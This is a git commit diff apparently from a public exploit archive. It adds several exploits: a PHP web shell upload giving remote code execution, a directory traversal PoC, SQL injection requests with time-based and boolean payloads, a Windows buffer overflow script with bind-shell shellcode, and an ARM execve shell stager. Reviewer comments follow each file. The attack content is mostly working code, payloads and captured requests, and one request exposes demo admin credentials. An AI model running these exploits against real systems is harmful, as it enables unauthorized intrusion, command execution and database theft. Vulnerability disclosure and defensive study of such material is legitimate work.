DB: 2018-09-05
6 changes to exploits/shellcodes iSmartViewPro 1.5 - 'DDNS' Buffer Overflow Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection mooSocial Store Plugin 2.6 - SQL Injection Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)
This commit is contained in:
parent
925b2171f4
commit
14bdc56535
8 changed files with 338 additions and 0 deletions
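--- /dev/null
+++ b/exploits/php/webapps/45326.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
+# Dork: N/A
+# Date: 2018-09-03
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://www.logicspice.com/products/faq-script
+# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
+# Version: 2.9.7
+# Category: Webapps
+# Tested on: Kali linux
+
+# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which
+# leads to a remote command execution on the remote server.
+
+# 1) Create a file with the below PHP code and save it as .php
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+
+# 2) Login to FAQ Script admin portal as priviliage user
+# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
+# 4) Click at the Actions button of a current FAQ product --> Edit
+# 5) Click (Image) button on Content panel.
+# 6) Chose Upload section and browse your .php file.
+# 7) Finaly click "Send it to Server". Script will give you a link belong to
+# our php file.
+# 8) verift the exploit:
+# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id
+
+# The request:
+
+POST
+/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
+HTTP/1.1
+Host: faq-script.logicspice.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter
+Cookie: __asc=3c88bfff1659e6148e6168c52d2;
+__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
+_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
+admin_username=logicspice; admin_password=faqscript_admin;
+CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data;
+boundary=---------------------------1036720403269880351068202740
+Content-Length: 267
+-----------------------------1036720403269880351068202740
+Content-Disposition: form-data; name="upload"; filename="shell.php"
+Content-Type: application/x-php
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+-----------------------------1036720403269880351068202740--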
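Review bot: The captured request ships the vendor demo's admin credentials and live session identifiers in the Cookie header (`admin_username=logicspice; admin_password=faqscript_admin;` plus the CAKEPHP/PHPSESSID values), and the header block never says that the `/admin/faqs/faqimages` upload is only reachable with an authenticated admin session, so "Remote Code Execution" overstates the preconditions. I would add `# Note: post-authentication RCE - requires an admin session; the Cookie values below are from the vendor demo and must be replaced` after the `# Tested on:` line and blank the cookie values. The same cookie line shows the application keeping the admin password in plaintext in a client-side cookie, which is a separate weakness worth its own line if it reproduces on a fresh install (it cannot be confirmed from this one request). The `# Software Link` points at `phpmyfaq-2.9.7.zip`, which does not obviously match the product name and is worth double-checking before publication.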
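--- /dev/null
+++ b/exploits/php/webapps/45327.txt
@@ -0,0 +1,34 @@
+# Exploit Title: PHP File Browser Script 1 - Directory Traversal
+# Dork: N/A
+# Date: 2018-09-03
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
+# Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The "index.php" is vulnerable to directory traversal.
+# An attacker can see and read all files known by the name
+
+# Vulnerable File: index.php
+<?php // line 45
+
+72 $script = basename(__FILE__); // the name of this script
+73 $path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access
+74
+75 if($loc!=''){
+76 echo "<p id='bloc'><b>Browsing Location: </b><a href='index.php'><b>".ucfirst($loc1)."</b></a>
+77 <a href='$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>
+78 <a href=''><b>".ucfirst($locdem3)."</b></a></p>";}
+79 else{
+80 echo "<p id='bloc'><b>Browsing Location: </b><a href=''><b>Demo</b></a></p>";
+
+?> // line 151
+
+# PoC :
+
+https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]
+
+# You can write the known directory name instead of [DirectoryName].
+# Example: '/etc/' or '/var/www/'
+# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/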
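Review bot: The quoted excerpt shows the untrusted value being taken verbatim (`$path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo";`) but stops before the call that actually opens or lists `$path`, and it uses `$loc`, `$loc1`, `$rpath` and `$locdem2` that are not defined anywhere in the excerpt, so a reader cannot see where the traversal takes effect; the `// line 45` and `// line 151` markers also disagree with the `72`-`80` numbering on the quoted lines. I would extend the excerpt to the `opendir`/`scandir` (or equivalent) call that consumes `$path`, and state plainly that the PoC demonstrates a directory listing of `/etc/` - reading file contents is claimed in the description but not shown by the request given. A one-line remediation hint such as `# Fix: resolve realpath($base . '/' . $path) and reject it unless it starts with realpath($base)` would help vendor-side readers.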
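--- /dev/null
+++ b/exploits/php/webapps/45328.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection
+# Google Dork: N/A
+# Date: 2018-08-31
+# Exploit Author: Renos Nikolaou
+# Software Link: https://codecanyon.net/item/simple-pos-point-of-sale-made-easy/3947976
+# Vendor Homepage: https://tecdiary.com/
+# Version: 4.0.24
+# Tested on: Windows 10
+# CVE: N/A
+# Description : The vulnerability allows an attacker to inject sql commands on 'columns[0][search][value]' parameters in the management panel.
+
+# PoC:
+
+http://domain.com/spos/products
+
+POST /spos/products/get_products/1 HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://domain.com/spos/products
+Content-Length: 2085
+Cookie: spos_spos_cookie=ab62f546025dd1a7d652ba75d13b87dc; spos_session=049soe8cr49aq318q7qhqlic6kpdgdee
+Connection: close
+
+draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
+
+
+# SQLMap Result:
+# SQLmap command: ./sqlmap.py -r spos.txt --dbms=mysql -v4 -p 'columns[0][search][value]' --banner --level 5 --risk 3 --tamper=space2comment --random-agent
+
+Parameter: columns[0][search][value] (POST)
+Type: boolean-based blind
+Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+Payload: draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
+
+Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+---
+web server operating system: Windows
+web application technology: PHP 7.1.16, Apache 2.4.33
+back-end DBMS: MySQL >= 5.0.12
+banner: '10.1.31-MariaDB'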
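Review bot: The sqlmap block labels the parameter `Type: boolean-based blind` with a `MySQL RLIKE` title while the payload and the `Vector:` line are a time-based `SLEEP()` injection, so the advisory contradicts itself about the technique; `Type: AND/OR time-based blind` with `Title: MySQL >= 5.0.12 AND time-based blind` is what matches the vector actually shown. The request also depends on an authenticated session (`spos_session` cookie) and a per-session `spos_token` value, which the header block never states; I would add `# Note: post-authentication - requires a valid spos_session cookie and the matching spos_token` under the `# Description` line. The other `columns[N][search][value]` fields are sent the same way and may be injectable too, but only `columns[0]` is demonstrated here, so the title should not be read as exhaustive.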
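--- /dev/null
+++ b/exploits/php/webapps/45330.txt
@@ -0,0 +1,44 @@
+# Exploit Title: mooSocial Store Plugin 2.6 - SQL Injection
+# Exploit Author: Andrea Bocchetti
+# Date: 2018-08-28
+# Google Dork: N/A -
+# Vendor: https://moosocial.com/product/store-plugins/
+# Software Link: https://moosocial.com/product/store-plugins/
+# Demo URL: http://addons.moosocial.com/stores
+# Purchase link: https://moosocial.com/addons/
+# Affected Version: all versions
+# Patched Version: 2.7
+# Category: Web Application
+# Platform: PHP
+# Tested on: Ubuntu
+# CVE: N/A
+
+# 1. Technical Description:
+# mooSocial Store Plugin is affected by Blind SQL Injection in the product parameter used with URL Rewrite
+
+GET /stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 HTTP/1.1
+Host: addons.moosocial.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: CAKEPHP=2b0v0a2360nhl46psmm1mejsi7
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+# 3. Payload:
+
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+
+Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND 5011=5011
+
+# Type: stacked queries
+# Title: MySQL > 5.0.11 stacked queries (comment)
+# Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65;SELECT SLEEP(5)#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+
+Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND SLEEP(5)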
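Review bot: `# Affected Version: all versions` contradicts both the `2.6` in the title and `# Patched Version: 2.7`; it should read `# Affected Version: <= 2.6` (or name the versions actually tested). The section numbering jumps from `# 1. Technical Description` to `# 3. Payload`, so either a `# 2.` heading was lost or the numbers should be `1`/`2`. The stacked-queries payload (`;SELECT SLEEP(5)#`) is a sqlmap-reported technique that only works when the driver executes multi-statements, and nothing in the single GET shown confirms that it did; I would mark it as unconfirmed or keep only the boolean-based and time-based payloads that the request can actually demonstrate. The captured request targets the vendor's live demo host, which is fine for a PoC but should use the same `xxx.xxx` placeholder as the payload lines.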
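--- /dev/null
+++ b/exploits/windows_x86/local/45325.py
@@ -0,0 +1,57 @@
+# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-09-03
+# Vendor Homepage: https://securimport.com/
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Vulnerability Type: Buffer Overflow
+# Tested on OS: Windows XP Professional SP3 x86 es
+
+# Steps to Produce the Buffer Overflow:
+# 1.- Run python code : iSmartViewPro_1.5.py
+# 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- Add Device
+# 5.- Add device manually
+# 6.- Device alias -> test
+# 7.- Paste ClipBoard on "DDNS/IP/DID"
+# 8.- Account -> admin
+# 9.- Password -> admin
+# 10.- Save
+
+#!/usr/bin/env python
+
+#7E6B30D7 FFE4 JMP ESP SHELL32.dll
+ret = "\xD7\x30\x6B\x7E"
+
+#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
+shellcode = (
+"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
+"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
+"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
+"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
+"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
+"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
+"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
+"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
+"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
+"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
+"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
+"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
+"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
+"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
+"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
+"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
+"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
+"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
+"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
+"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
+"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
+"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
+"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
+
+buffer = "\x41" * 383 + ret + "\x90" * 8 + shellcode
+f = open ("iSmartViewPro_1.5.txt", "w")
+f.write(buffer)
+f.close()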
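Review bot: The payload file is opened in text mode (`f = open ("iSmartViewPro_1.5.txt", "w")`), so on the Windows host named in `# Tested on OS` any 0x0A byte in `buffer` would be written out as 0x0D 0x0A; the `-b '\x00\x0A\x0D'` given to msfvenom keeps those bytes out of the shellcode, but `ret` and the NOP sled are not covered by that exclusion and a regenerated payload could be silently corrupted - use `f = open("iSmartViewPro_1.5.txt", "wb")` (with a `b''` literal under Python 3). The `JMP ESP` at `0x7E6B30D7` comes from `SHELL32.dll` on the Spanish XP SP3 build (`x86 es`), so the address is OS- and locale-specific and a comment such as `# ret: JMP ESP in SHELL32.dll on Windows XP SP3 es - rebase for other builds` belongs next to it. The header also never states that `windows/shell_bind_tcp` listens on msfvenom's default LPORT (4444 unless overridden at generation time), which the operator needs in order to connect after step 10.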
@ -9936,6 +9936,7 @@ id,file,description,date,author,type,platform,port
45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39917,3 +39918,7 @@ id,file,description,date,author,type,platform,port
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,
45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,
45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php,
45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,
@ -907,3 +907,4 @@ id,file,description,date,author,type,platform
45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
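--- /dev/null
+++ b/shellcodes/arm/45329.c
@@ -0,0 +1,96 @@
+/*
+# Title: Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
+# Date: 2018-08-31
+# Tested: armv7l (Raspberry Pi 3 Model B+)
+# Author: Ken Kitahara
+
+[System Information]
+pi@raspberrypi:~ $ uname -a
+Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
+pi@raspberrypi:~ $ lsb_release -a
+No LSB modules are available.
+Distributor ID: Raspbian
+Description: Raspbian GNU/Linux 9.4 (stretch)
+Release: 9.4
+Codename: stretch
+pi@raspberrypi:~ $
+
+[Procedure]
+(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode (20 Bytes).
+
+pi@raspberrypi:~ $ cat binsh.s
+.section .text
+.global _start
+
+_start:
+.THUMB
+// execve("/bin/sh", NULL, NULL)
+adr r0, spawn
+eor r1, r1, r1
+eor r2, r2, r2
+strb r2, [r0, #7]
+mov r7, #0xb
+svc #1
+
+spawn:
+.ascii "/bin/shX"
+pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
+pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin && echo
+\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
+pi@raspberrypi:~ $
+
+
+(2) Create stager shellcode (20 Bytes).
+
+pi@raspberrypi:~ $ cat stager.s
+.section .text
+.global _start
+
+_start:
+.ARM
+add lr, pc, #1
+bx lr
+
+.THUMB
+// read(0, buf, 0xff)
+eor r0, r0, r0
+adr r1, loadpoint
+mov r2, #0xff
+mov r7, #3
+svc #1
+mov pc, r1
+loadpoint:
+pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
+pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
+\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x02\xa1\xff\x22\x03\x27\x01\xdf\x8f\x46
+pi@raspberrypi:~ $
+
+(3) Operation test.
+
+pi@raspberrypi:~ $ (echo -ne "\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
+id
+uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
+exit
+^C
+pi@raspberrypi:~ $
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char sc[] = \
+"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
+"\x40\x40\x02\xa1\xff\x22\x03\x27"
+"\x01\xdf\x8f\x46";
+
+void main()
+{
+printf("Shellcode Length: %d\n", strlen(sc));
+
+int (*ret)() = (int(*)())sc;
+
+ret();
+}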
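Review bot: The stager's `read(0, buf, 0xff)` writes up to 255 bytes starting at `loadpoint`, which in this harness is the byte immediately after the 20-byte `sc[]` array, so the second stage is written past the end of `sc` into whatever the linker placed next in `.data`; declaring the buffer with room for the stage (`unsigned char sc[0x100] = ...`) keeps that write inside the object, the way `ld -N` did for the standalone `stager` binary. The harness also needs `.data` and the received stage to be executable and gives no build line; `gcc -z execstack -o loader 45329.c` is the usual incantation on a kernel of this vintage, but I have not verified it on armv7 and it should be stated in the header comment along with the `./loader < stage` usage. `void main()` should be `int main(void)`, and `strlen(sc)` only reports 20 because no byte of the stager is 0x00 - worth a one-line comment (`/* no NUL bytes, so strlen() gives the true length */`) so a later edit does not silently break the length check.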